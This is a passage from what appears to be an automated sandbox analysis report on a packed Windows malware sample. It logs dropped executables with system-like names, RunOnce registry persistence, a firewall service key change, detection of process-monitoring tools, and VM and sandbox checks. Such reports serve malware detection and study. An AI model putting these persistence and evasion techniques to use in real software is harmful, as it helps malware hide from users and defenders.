                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeSection loaded: msvbvm60.dllJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeSection loaded: vb6zz.dllJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Resources\svchost.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Resources\svchost.exeSection loaded: msvbvm60.dllJump to behavior
                          Source: C:\Windows\Resources\svchost.exeSection loaded: vb6zz.dllJump to behavior
                          Source: C:\Windows\Resources\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Resources\svchost.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Resources\svchost.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeSection loaded: msvbvm60.dllJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeSection loaded: vb6zz.dllJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: msvbvm60.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: vb6zz.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: wmsgapi.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: msctfmonitor.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: msutb.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\consent.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\Resources\svchost.exeSection loaded: msvbvm60.dllJump to behavior
                          Source: C:\Windows\Resources\svchost.exeSection loaded: vb6zz.dllJump to behavior
                          Source: C:\Windows\Resources\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Resources\svchost.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Resources\svchost.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                          Source: System32.exeStatic file information: File size 5537484 > 1048576
                          Source: System32.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x4ea000
                          Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb{ source: system32.exe , 00000002.00000002.3376294690.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: system32.exe , 00000002.00000002.3376294690.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb&Rt_ source: system32.exe , 00000002.00000002.3376294690.0000000001030000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: system32.exe , 00000002.00000002.3376294690.0000000001037000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbK source: system32.exe , 00000002.00000002.3376294690.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb" source: system32.exe , 00000002.00000002.3376294690.0000000001037000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.ServiceModel.pdb source: system32.exe , 00000002.00000002.3376294690.0000000001066000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: system32.exe , 00000002.00000002.3376294690.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: system32.exe , 00000002.00000002.3376294690.0000000001030000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.ServiceModel.pdb2( source: system32.exe , 00000002.00000002.3376294690.0000000001037000.00000004.00000020.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          Detected CryptOne packer
                          Source: C:\Windows\Resources\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B196B287-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32Jump to behavior
                          Source: system32.exe .0.drStatic PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                          Source: system32.exe .0.drStatic PE information: real checksum: 0x0 should be: 0x57608
                          Source: explorer.exe.3.drStatic PE information: real checksum: 0x54bbea should be: 0x59adcd
                          Source: icsys.icn.exe.0.drStatic PE information: real checksum: 0x54bbea should be: 0x4fe445
                          Source: spoolsv.exe.5.drStatic PE information: real checksum: 0x54bbea should be: 0x59a768
                          Source: svchost.exe.6.drStatic PE information: real checksum: 0x54bbea should be: 0x59e3d9
                          Source: System32.exeStatic PE information: section name:
                          Source: System32.exeStatic PE information: section name:
                          Source: System32.exeStatic PE information: section name:
                          Source: System32.exeStatic PE information: section name: .themida
                          Source: System32.exeStatic PE information: section name: .boot
                          Source: icsys.icn.exe.0.drStatic PE information: section name:
                          Source: icsys.icn.exe.0.drStatic PE information: section name:
                          Source: icsys.icn.exe.0.drStatic PE information: section name:
                          Source: icsys.icn.exe.0.drStatic PE information: section name: .themida
                          Source: icsys.icn.exe.0.drStatic PE information: section name: .boot
                          Source: explorer.exe.3.drStatic PE information: section name:
                          Source: explorer.exe.3.drStatic PE information: section name:
                          Source: explorer.exe.3.drStatic PE information: section name:
                          Source: explorer.exe.3.drStatic PE information: section name: .themida
                          Source: explorer.exe.3.drStatic PE information: section name: .boot
                          Source: spoolsv.exe.5.drStatic PE information: section name:
                          Source: spoolsv.exe.5.drStatic PE information: section name:
                          Source: spoolsv.exe.5.drStatic PE information: section name:
                          Source: spoolsv.exe.5.drStatic PE information: section name: .themida
                          Source: spoolsv.exe.5.drStatic PE information: section name: .boot
                          Source: svchost.exe.6.drStatic PE information: section name:
                          Source: svchost.exe.6.drStatic PE information: section name:
                          Source: svchost.exe.6.drStatic PE information: section name:
                          Source: svchost.exe.6.drStatic PE information: section name: .themida
                          Source: svchost.exe.6.drStatic PE information: section name: .boot
                          Source: System32.exeStatic PE information: section name: entropy: 7.943973649289031
                          Source: icsys.icn.exe.0.drStatic PE information: section name: entropy: 7.943973649289031
                          Source: explorer.exe.3.drStatic PE information: section name: entropy: 7.943973649289031
                          Source: spoolsv.exe.5.drStatic PE information: section name: entropy: 7.943973649289031
                          Source: svchost.exe.6.drStatic PE information: section name: entropy: 7.943973649289031

                          Persistence and Installation Behavior

                          barindex
                          Drops PE files with benign system names
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeFile created: C:\Windows\Resources\Themes\explorer.exeJump to dropped file
                          Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\spoolsv.exeJump to dropped file
                          Source: C:\Windows\Resources\spoolsv.exeFile created: C:\Windows\Resources\svchost.exeJump to dropped file
                          Drops executables to the windows directory (C:\Windows) and starts them
                          Source: C:\Windows\System32\svchost.exeExecutable created and started: c:\windows\resources\themes\explorer.exeJump to behavior
                          Source: C:\Windows\System32\svchost.exeExecutable created and started: c:\windows\resources\svchost.exeJump to behavior
                          Source: C:\Windows\Resources\svchost.exeExecutable created and started: c:\windows\resources\spoolsv.exeJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeExecutable created and started: C:\Windows\Resources\Themes\icsys.icn.exeJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeFile created: C:\Users\user\Desktop\system32.exe Jump to dropped file
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeFile created: C:\Windows\Resources\Themes\explorer.exeJump to dropped file
                          Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\spoolsv.exeJump to dropped file
                          Source: C:\Windows\Resources\spoolsv.exeFile created: C:\Windows\Resources\svchost.exeJump to dropped file
                          Source: C:\Users\user\Desktop\System32.exeFile created: C:\Windows\Resources\Themes\icsys.icn.exeJump to dropped file
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeFile created: C:\Windows\Resources\Themes\explorer.exeJump to dropped file
                          Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\spoolsv.exeJump to dropped file
                          Source: C:\Windows\Resources\spoolsv.exeFile created: C:\Windows\Resources\svchost.exeJump to dropped file
                          Source: C:\Users\user\Desktop\System32.exeFile created: C:\Windows\Resources\Themes\icsys.icn.exeJump to dropped file
                          Source: C:\Users\user\Desktop\System32.exeFile created: C:\Users\user\Desktop\system32.exe Jump to dropped file

                          Boot Survival

                          barindex
                          Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                          Source: C:\Users\user\Desktop\System32.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Windows\Resources\svchost.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Windows\Resources\svchost.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Windows\Resources\svchost.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Windows\Resources\svchost.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Windows\Resources\svchost.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Windows\Resources\svchost.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Windows\Resources\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccessJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\System32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\system32.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Query firmware table information (likely to detect VMs)
                          Source: C:\Users\user\Desktop\System32.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Windows\Resources\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Windows\Resources\spoolsv.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Windows\Resources\Themes\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Windows\Resources\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Tries to detect sandboxes / dynamic malware analysis system (registry check)
                          Source: C:\Users\user\Desktop\System32.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
